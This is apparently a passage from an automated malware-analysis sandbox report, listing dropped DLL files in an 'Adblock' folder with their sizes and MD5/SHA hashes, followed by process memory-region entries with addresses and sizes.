                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                              1c239d20dd9f6b6a2c96d332e7658c4d9b12b6e1e1153bfb04b5bcf101fe91f4df28fa9c4801ad4fa5843a77f3fa99419b0c99a0c4ae5e5b6e76ac0777eb9c2a

                                                                                                                                                                                                                                                                            • C:\Users\Admin\Programs\Adblock\MassiveService.dll
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              3.5MB

                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                              9a00d1d190c8d2f96a63f85efb3b6bd7

                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                              7919fe3ef84f6f71647093732a31a494136e96b4

                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                              2ae72c5c7569bfc3729606ecf23d43a70ac5448f683128c08263410f788b4cd9

                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                              13bf806a1dae7a8de2407abaf5562d3f18a2f02d2508f80e500406b6322723dcecfcf202c05b1293045575a10c1c7a2b67e567aaa9102e66620158c794e5d38c

                                                                                                                                                                                                                                                                            • C:\Users\Admin\Programs\Adblock\MassiveService.dll
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              3.5MB

                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                              9a00d1d190c8d2f96a63f85efb3b6bd7

                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                              7919fe3ef84f6f71647093732a31a494136e96b4

                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                              2ae72c5c7569bfc3729606ecf23d43a70ac5448f683128c08263410f788b4cd9

                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                              13bf806a1dae7a8de2407abaf5562d3f18a2f02d2508f80e500406b6322723dcecfcf202c05b1293045575a10c1c7a2b67e567aaa9102e66620158c794e5d38c

                                                                                                                                                                                                                                                                            • C:\Users\Admin\Programs\Adblock\WinSparkle.dll
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              2.3MB

                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                              dc301b230db0b280502f7664ef36d979

                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                              dc5dd76ae2b099eda3dfe42412ff1f7707614254

                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                              d4bf5352011fce73574618d067b5bbbecbef135d0caf4de5161dff8462623a60

                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                              26fcc52c6ad1e4dca774127f5dc2c228169cea1eb024fe2e096fc033f8426496c4447eab63c6271620259ff929c7a35998b11396ae596a64f1e1bd87c27ce1f6

                                                                                                                                                                                                                                                                            • C:\Users\Admin\Programs\Adblock\WinSparkle.dll
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              2.3MB

                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                              dc301b230db0b280502f7664ef36d979

                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                              dc5dd76ae2b099eda3dfe42412ff1f7707614254

                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                              d4bf5352011fce73574618d067b5bbbecbef135d0caf4de5161dff8462623a60

                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                              26fcc52c6ad1e4dca774127f5dc2c228169cea1eb024fe2e096fc033f8426496c4447eab63c6271620259ff929c7a35998b11396ae596a64f1e1bd87c27ce1f6

                                                                                                                                                                                                                                                                            • memory/388-264-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/436-291-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/452-312-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/452-321-0x0000000000400000-0x0000000000459000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              356KB

                                                                                                                                                                                                                                                                            • memory/452-336-0x0000000060900000-0x0000000060992000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              584KB

                                                                                                                                                                                                                                                                            • memory/452-335-0x0000000000400000-0x0000000000459000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              356KB

                                                                                                                                                                                                                                                                            • memory/452-319-0x0000000000400000-0x0000000000459000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              356KB

                                                                                                                                                                                                                                                                            • memory/452-316-0x0000000000400000-0x0000000000459000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              356KB

                                                                                                                                                                                                                                                                            • memory/452-314-0x0000000000400000-0x0000000000459000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              356KB

                                                                                                                                                                                                                                                                            • memory/528-134-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/700-167-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/964-203-0x000000000217B000-0x000000000220D000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              584KB

                                                                                                                                                                                                                                                                            • memory/964-211-0x0000000002220000-0x000000000233B000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              1.1MB

                                                                                                                                                                                                                                                                            • memory/964-163-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/1056-282-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/1068-258-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/1188-175-0x0000000000400000-0x00000000004CE000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              824KB

                                                                                                                                                                                                                                                                            • memory/1188-333-0x0000000000400000-0x00000000004CE000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              824KB

                                                                                                                                                                                                                                                                            • memory/1188-240-0x0000000000400000-0x00000000004CE000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              824KB

                                                                                                                                                                                                                                                                            • memory/1188-186-0x0000000000400000-0x00000000004CE000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              824KB

                                                                                                                                                                                                                                                                            • memory/1188-168-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/1388-225-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/1520-140-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/1544-311-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/1604-133-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/1760-296-0x000000001BD40000-0x000000001C776000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              10.2MB

                                                                                                                                                                                                                                                                            • memory/1760-295-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/1936-224-0x000000001B610000-0x000000001C046000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              10.2MB

                                                                                                                                                                                                                                                                            • memory/1936-217-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/1988-330-0x0000000000400000-0x0000000000485000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              532KB

                                                                                                                                                                                                                                                                            • memory/1988-317-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/1988-328-0x0000000002080000-0x00000000020BF000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              252KB

                                                                                                                                                                                                                                                                            • memory/1988-327-0x0000000000510000-0x0000000000610000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              1024KB

                                                                                                                                                                                                                                                                            • memory/1988-367-0x0000000000400000-0x0000000000485000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              532KB

                                                                                                                                                                                                                                                                            • memory/1988-239-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/2076-187-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/2148-299-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/2160-309-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/2164-156-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/2224-271-0x000000001BBC0000-0x000000001C5F6000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              10.2MB

                                                                                                                                                                                                                                                                            • memory/2224-265-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/2244-308-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/2252-280-0x000000001C940000-0x000000001D376000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              10.2MB

                                                                                                                                                                                                                                                                            • memory/2252-269-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/2312-147-0x00000000043E0000-0x0000000004586000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              1.6MB

                                                                                                                                                                                                                                                                            • memory/2312-130-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/2312-135-0x00000000043E0000-0x0000000004586000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              1.6MB

                                                                                                                                                                                                                                                                            • memory/2312-226-0x00000000043E0000-0x0000000004586000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              1.6MB

                                                                                                                                                                                                                                                                            • memory/2332-357-0x000000000077D000-0x000000000078D000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              64KB

                                                                                                                                                                                                                                                                            • memory/2332-361-0x000000000077D000-0x000000000078D000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              64KB

                                                                                                                                                                                                                                                                            • memory/2332-359-0x00000000005C0000-0x00000000005C9000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              36KB

                                                                                                                                                                                                                                                                            • memory/2608-155-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/2608-236-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/2624-242-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/2632-380-0x000000002E670000-0x000000002E763000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              972KB

                                                                                                                                                                                                                                                                            • memory/2632-257-0x000000002E670000-0x000000002E763000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              972KB

                                                                                                                                                                                                                                                                            • memory/2632-256-0x000000002D1B0000-0x000000002D2D5000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              1.1MB

                                                                                                                                                                                                                                                                            • memory/2632-234-0x00000000025A0000-0x00000000035A0000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              16.0MB

                                                                                                                                                                                                                                                                            • memory/2632-300-0x000000002E770000-0x000000002E839000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              804KB

                                                                                                                                                                                                                                                                            • memory/2632-227-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/2632-303-0x000000002E840000-0x000000002E8F2000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              712KB

                                                                                                                                                                                                                                                                            • memory/2672-279-0x0000000000400000-0x000000000045C000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              368KB

                                                                                                                                                                                                                                                                            • memory/2672-292-0x0000000000400000-0x000000000045C000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              368KB

                                                                                                                                                                                                                                                                            • memory/2672-277-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/2672-304-0x0000000000400000-0x000000000045C000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              368KB

                                                                                                                                                                                                                                                                            • memory/2756-158-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/2756-194-0x0000000000400000-0x0000000000471000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              452KB

                                                                                                                                                                                                                                                                            • memory/2756-193-0x00000000005D0000-0x00000000005D9000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              36KB

                                                                                                                                                                                                                                                                            • memory/2756-192-0x000000000065C000-0x000000000066D000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              68KB

                                                                                                                                                                                                                                                                            • memory/2756-220-0x0000000000400000-0x0000000000471000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              452KB

                                                                                                                                                                                                                                                                            • memory/3184-310-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/3264-274-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/3264-318-0x000000000068D000-0x00000000006B6000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              164KB

                                                                                                                                                                                                                                                                            • memory/3264-315-0x00000000005E0000-0x0000000000626000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              280KB

                                                                                                                                                                                                                                                                            • memory/3264-313-0x000000000068D000-0x00000000006B6000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              164KB

                                                                                                                                                                                                                                                                            • memory/3332-221-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/3440-302-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/3560-306-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/3564-284-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/3596-222-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/3688-188-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/3700-157-0x0000000140000000-0x000000014067E000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              6.5MB

                                                                                                                                                                                                                                                                            • memory/3700-146-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/3724-143-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/3752-150-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/3768-253-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/3780-254-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/4128-185-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/4140-251-0x0000000000400000-0x0000000000537000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              1.2MB

                                                                                                                                                                                                                                                                            • memory/4140-252-0x0000000000400000-0x0000000000537000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              1.2MB

                                                                                                                                                                                                                                                                            • memory/4140-248-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/4140-255-0x0000000000400000-0x0000000000537000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              1.2MB

                                                                                                                                                                                                                                                                            • memory/4140-297-0x0000000000400000-0x0000000000537000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              1.2MB

                                                                                                                                                                                                                                                                            • memory/4232-174-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/4280-294-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/4284-196-0x00000000005F0000-0x000000000062F000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              252KB

                                                                                                                                                                                                                                                                            • memory/4284-244-0x0000000000400000-0x0000000000479000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              484KB

                                                                                                                                                                                                                                                                            • memory/4284-202-0x0000000000400000-0x0000000000479000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              484KB

                                                                                                                                                                                                                                                                            • memory/4284-139-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/4284-243-0x0000000000658000-0x000000000067E000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              152KB

                                                                                                                                                                                                                                                                            • memory/4284-195-0x0000000000658000-0x000000000067E000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              152KB

                                                                                                                                                                                                                                                                            • memory/4292-215-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/4312-136-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/4444-301-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/4480-247-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/4520-201-0x0000000010000000-0x0000000010D69000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              13.4MB

                                                                                                                                                                                                                                                                            • memory/4520-197-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/4572-241-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/4604-169-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/4604-293-0x0000000000400000-0x0000000000430000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              192KB

                                                                                                                                                                                                                                                                            • memory/4604-184-0x0000000000400000-0x0000000000430000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              192KB

                                                                                                                                                                                                                                                                            • memory/4604-238-0x0000000000400000-0x0000000000430000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              192KB

                                                                                                                                                                                                                                                                            • memory/4604-173-0x0000000000400000-0x0000000000430000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              192KB

                                                                                                                                                                                                                                                                            • memory/4616-245-0x00000000021CD000-0x000000000225F000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              584KB

                                                                                                                                                                                                                                                                            • memory/4616-228-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/4628-235-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/4736-212-0x0000000000400000-0x0000000000537000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              1.2MB

                                                                                                                                                                                                                                                                            • memory/4736-205-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/4736-216-0x0000000000400000-0x0000000000537000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              1.2MB

                                                                                                                                                                                                                                                                            • memory/4736-206-0x0000000000400000-0x0000000000537000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              1.2MB

                                                                                                                                                                                                                                                                            • memory/4736-229-0x0000000000400000-0x0000000000537000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              1.2MB

                                                                                                                                                                                                                                                                            • memory/4736-210-0x0000000000400000-0x0000000000537000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              1.2MB

                                                                                                                                                                                                                                                                            • memory/4844-237-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/4900-214-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/4992-183-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/5004-298-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/5008-263-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/5364-337-0x000000002D580000-0x000000002D6A5000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              1.1MB

                                                                                                                                                                                                                                                                            • memory/5364-369-0x000000002EC10000-0x000000002ECC2000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              712KB

                                                                                                                                                                                                                                                                            • memory/5364-339-0x000000002EA40000-0x000000002EB33000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              972KB

                                                                                                                                                                                                                                                                            • memory/5364-375-0x000000002EA40000-0x000000002EB33000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              972KB

                                                                                                                                                                                                                                                                            • memory/5364-323-0x00000000028D0000-0x00000000038D0000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              16.0MB

                                                                                                                                                                                                                                                                            • memory/5364-366-0x000000002EB40000-0x000000002EC09000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              804KB

                                                                                                                                                                                                                                                                            • memory/5660-383-0x0000000004A80000-0x0000000004AA2000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              136KB

                                                                                                                                                                                                                                                                            • memory/5660-381-0x0000000003C70000-0x0000000003CA6000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              216KB

                                                                                                                                                                                                                                                                            • memory/5660-382-0x00000000042E0000-0x0000000004908000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              6.2MB

                                                                                                                                                                                                                                                                            • memory/5660-386-0x0000000004B20000-0x0000000004B86000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              408KB

                                                                                                                                                                                                                                                                            • memory/5660-387-0x0000000004B90000-0x0000000004BF6000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              408KB

                                                                                                                                                                                                                                                                            • memory/5660-389-0x0000000005200000-0x000000000521E000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              120KB

                                                                                                                                                                                                                                                                            • memory/6568-362-0x0000000140000000-0x0000000140684000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              6.5MB

                                                                                                                                                                                                                                                                            • memory/6740-376-0x0000000010000000-0x0000000010D69000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              13.4MB

                                                                                                                                                                                                                                                                            • memory/6804-373-0x0000000000400000-0x0000000000409000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              36KB

                                                                                                                                                                                                                                                                            • memory/6804-360-0x0000000000400000-0x0000000000409000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              36KB

                                                                                                                                                                                                                                                                            • memory/6804-358-0x0000000000400000-0x0000000000409000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              36KB